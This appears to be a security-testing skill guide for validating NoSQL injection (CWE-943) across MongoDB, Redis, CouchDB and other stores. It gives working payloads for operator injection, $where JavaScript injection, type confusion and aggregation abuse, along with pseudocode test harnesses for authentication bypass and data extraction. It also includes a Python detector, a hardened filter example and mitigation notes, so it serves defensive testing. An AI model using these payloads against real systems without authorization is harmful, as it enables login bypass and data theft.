Validate NoSQL injection vulnerabilities across MongoDB, Cassandra, CouchDB, Redis, and other NoSQL databases. Test operator injection, JavaScript injection, and query manipulation patterns. Use when testing CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) and related NoSQL injection classes.
Validate NoSQL injection vulnerabilities by injecting special operators, JavaScript code, or malformed queries into user-controlled inputs and observing how the application responds. Injection classes covered:

- Operator injection ($ne, $gt, $regex)
- JavaScript injection ($where, mapReduce)

### Operator Injection

Inject MongoDB query operators to manipulate query logic.
Detection Methods:
- `{"$ne": ""}` — not equal to empty string; bypasses equality checks
- `{"$gt": ""}` — greater than empty string; returns all matching documents
- `{"$regex": ".*"}` — regex wildcard match
- `{"$or": [...]}` — logical OR injection

Example Attack:
```javascript
// Normal: {"username": "admin", "password": "secret"}
// Attack: {"username": "admin", "password": {"$ne": ""}}
// Effect: Returns admin user regardless of password
```
### JavaScript Injection

Inject JavaScript in databases supporting server-side execution.

Detection Methods:
- `$where` clause injection: `{"$where": "this.password.length > 0"}`
- mapReduce function injection
- `$function` aggregation operator (MongoDB 4.4+)

Example Attack:
```javascript
// Payload: {"$where": "sleep(5000) || true"}
// Effect: 5-second delay if JS execution enabled
```
### Type Confusion

Exploit type confusion when arrays or objects are passed where strings are expected.

Detection Methods:
- `username[$ne]=` via query string (Express.js extended query parser)
- `items[0]=malicious`

### Aggregation Pipeline Injection

Inject into MongoDB aggregation pipelines.
Detection Methods:
- `$lookup` injection for cross-collection access
- `$out` or `$merge` for write operations
- `$group` manipulation for data extraction

| Database | Operator Injection | JS Injection | Boolean-Based | Time-Based |
|---|---|---|---|---|
| MongoDB | ✓ ($ne, $gt, $regex, $or) | ✓ ($where, mapReduce) | ✓ | ✓ (via $where sleep or heavy ops) |
| CouchDB | ✓ (view manipulation) | ✓ (design doc JS) | ✓ | Limited |
| Cassandra | Limited (CQL injection) | No | ✓ | Limited |
| Redis | Command injection patterns | Lua script injection | ✓ | ✓ (DEBUG SLEEP) |
| Elasticsearch | ✓ (query DSL manipulation) | ✓ (scripting if enabled) | ✓ | ✓ (script-based) |
| DynamoDB | Condition expression injection | No | ✓ | No |
Key Insight: NoSQL APIs typically accept JSON; look for object/array inputs where operators can be injected.
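To make the type-confusion and operator-injection points above concrete, here is an added example in Python (not part of the original skill or its reference scripts): a model of the qs-style extended query parser that turns `username[$ne]=` into an operator object, a detector that reports any `$`-prefixed key in a decoded request body, and a hardened filter builder that only forwards plain strings to the query. The parser model and the function names are assumptions for illustration, and the nested-key handling is simplified relative to the real qs library.

```python
import re
from typing import Any


def parse_extended_query(qs: str) -> dict[str, Any]:
    """Constructed model of an 'extended' qs-style parser (the Express.js
    default): 'username[$ne]=' becomes {'username': {'$ne': ''}}.
    Nested keys are modelled as dicts; the real qs library would build a
    list for numeric indexes such as 'items[0]'."""
    result: dict[str, Any] = {}
    for pair in filter(None, qs.split("&")):
        key, _, value = pair.partition("=")
        path = [p for p in re.split(r"[\[\]]", key) if p]  # "a[b][c]" -> a, b, c
        node = result
        for part in path[:-1]:
            node = node.setdefault(part, {})
        node[path[-1]] = value
    return result


def find_operators(value: Any, path: str = "") -> list[str]:
    """Return the path of every key that begins with '$' (MongoDB operator
    syntax) anywhere inside a decoded body or query object. An empty list
    means no operator reached the application from user input."""
    found: list[str] = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = f"{path}.{key}" if path else key
            if key.startswith("$"):
                found.append(child_path)
            found.extend(find_operators(child, child_path))
    elif isinstance(value, list):
        for i, child in enumerate(value):
            found.extend(find_operators(child, f"{path}[{i}]"))
    return found


def strict_string_filter(body: dict[str, Any], fields: tuple[str, ...]) -> dict[str, str]:
    """Hardened filter builder: every expected field must be a plain string,
    so an injected object such as {'$ne': ''} can never reach the query as
    an operator. Unknown fields are dropped rather than forwarded."""
    query: dict[str, str] = {}
    for name in fields:
        value = body.get(name)
        if not isinstance(value, str):
            raise ValueError(f"{name} must be a string, got {type(value).__name__}")
        query[name] = value
    return query
```

`find_operators` is the check to run on decoded input at the API boundary; `strict_string_filter` is the shape the query builder should have so the check is not needed for equality lookups.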
The validation snippets below are pseudocode: `post`, `get` and `measure` are assumed to be helpers from the validation harness.

Operator Injection (Authentication Bypass):
```python
# Baseline
baseline = post("/login", json={"username": "admin", "password": "wrong"})
# Expected: 401 Unauthorized

# Test with $ne operator
test = post("/login", json={"username": "admin", "password": {"$ne": ""}})
# If 200 OK: VALIDATED - operator injection bypassed auth
```

Operator Injection (Data Extraction):
```python
# Baseline
baseline = get("/api/users?role=user")
# Expected: Returns only users with role="user"

# Test with $gt operator
test = get("/api/users?role[$gt]=")
# If returns more users: VALIDATED - operator injection expanded query
```

Boolean-Based Inference:
```python
# True condition
true_resp = post("/api/search", json={"name": {"$regex": "^a"}})
# False condition
false_resp = post("/api/search", json={"name": {"$regex": "^zzzzz"}})

# Compare response lengths/content
if len(true_resp.text) != len(false_resp.text):
    status = "VALIDATED"
```

JavaScript Injection (if enabled):
```python
# Time-based test: measure() returns the request duration in seconds
baseline_time = measure(post("/api/query", json={"filter": "normal"}))
test_time = measure(post("/api/query", json={"$where": "sleep(5000) || true"}))

if test_time > baseline_time + 4.5:
    status = "VALIDATED"
```
| Status | Meaning |
|---|---|
| VALIDATED | Clear NoSQLi indicators (auth bypass, data leak, JS execution, boolean/time diff) |
| FALSE_POSITIVE | No indicators; operators rejected or sanitized |
| PARTIAL | Weak signals (small differences, inconsistent results) |
| UNVALIDATED | Blocked, error, or insufficient evidence |
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response): status, injection_type, cwe. Never run write or destructive operations (`$out`, `db.dropDatabase()`) during validation.

Validated examples:
- NoSQL injection on /login - $ne operator bypassed password check (CWE-943). Admin access without credentials.
- MongoDB $where injection on /api/search - sleep(5000) caused 5.1s delay (CWE-943). Server-side JS execution confirmed.
- Operator injection on /api/users - $gt operator returned all users instead of filtered set (CWE-943).

Unvalidated example:
- NoSQL injection test incomplete on /api/data - operators rejected with 400 Bad Request. Evidence: path/to/evidence.json
Primary CWE (DAST-testable): CWE-943 (Improper Neutralization of Special Elements in Data Query Logic)
Parent/Related CWEs (context):
Sibling CWEs under CWE-943 (for reference):
Related Attack Pattern:
Note: Unlike SQL injection (CWE-89), NoSQL injection does not have a dedicated base-level CWE. CWE-943 at the class level is the correct mapping for NoSQL injection vulnerabilities per MITRE guidance.
Mitigation note: server-side JavaScript execution in MongoDB can be disabled (`--noscripting`), which removes the `$where`/mapReduce injection surface.

See also:
- `reference/nosql_payloads.py` for NoSQLi payloads by database type
- `reference/validate_nosqli.py` for NoSQLi-focused validation flow
- `examples.md` for concrete NoSQLi scenarios and evidence formats